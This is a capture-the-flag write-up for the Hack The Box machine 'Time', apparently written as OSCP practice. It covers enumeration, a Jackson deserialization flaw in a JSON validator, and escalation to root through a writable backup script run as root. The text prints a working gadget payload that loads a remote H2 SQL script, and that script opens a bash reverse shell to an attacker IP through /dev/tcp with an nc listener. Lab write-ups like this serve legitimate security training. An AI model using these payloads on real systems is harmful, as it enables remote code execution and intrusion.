OSCP PREPROTİONS – HTB Time

Time machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 22/tcp ssh OpenSSH 8.2p1 and 80/tcp http Apache ports are open. Since there is no vulnerability in the ssh port, we provide enumeration over port 80.
We performed file and directory scans.
Gobuster scan

File and directory scanning did not yield any results.
We looked in developer options, source code and wepanalyzer and found nothing.

Looking at the input values, we understand that it organizes the json here as Beautify and Validate.
Let’s write a json and see how it parse.

Written json {“name”: “muhammed”, “surname”: “aygun”, “age”: “null”} output;

Let’s parse with validate

When parse
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
We got the error.
Here we understand that the json we wrote is running on the server.
Let’s investigate this error. Is there any exploit?

When we investigated the error, we realized that it was an exploit due to the json error, this exploit https://blog.doyensec.com/2019/07/22/jackson-gadgets.html is very well explained. It accepts JSON content sent by an unknown client in the application. It contains SSRF and RCE vulnerabilities. Let’s search for the exploit of these vulnerabilities on Google.

We came across a github repo, and here’s what to do with it according to this repo;

  1. create the inject.sql file. It contains

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {“bash”, “-c”, cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(“\A”);
return s.hasNext() ? s.next() : “”; }
$$;
CALL SHELLEXEC(‘bash -i >& /dev/tcp/10.10.14.4/4747 0>&1’)
The code is written.

  1. python3 -m http.server
    command is typed and the web server is offered to the target machine to access this file.
  2. Nc -lvnp 4747
    We listen to the port with the command.
  3. From the vulnerable application
    [“ch.qos.logback.core.db.DriverManagerConnectionSource”, {“url”: “jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM ‘http://10.10.14.4:8000/inject.sql'”}]
    The command is executed

After the command ran, we got our Shell.
This way we got our user flag

We could not access the root directory because we do not have root authorization after the user flag. We provide local enumeration to access root authorization.

/usr/bin/timer_backup.sh file. Let’s look at the contents of this file.

Here the timmer part draws our attention, let’s find time_backup.timer here and understand what it does

Here it calls timer_backup.service.
Let’s look at timer_backup.service

Here we saw it running /usr/bin/timer_backup.sh. Linpeas.sh also told us that it is among the interesting files 🙂
Let’s look at the content and ownership of this file.

Here we have seen the content of bash scrpit written in bash scrpit doing something related to backup, here the ownership of the file is owned by the pericles user that we have captured, then if we edit this file to give us revershell we can get root authorization.

We got root authorization

That’s how we got root authorization.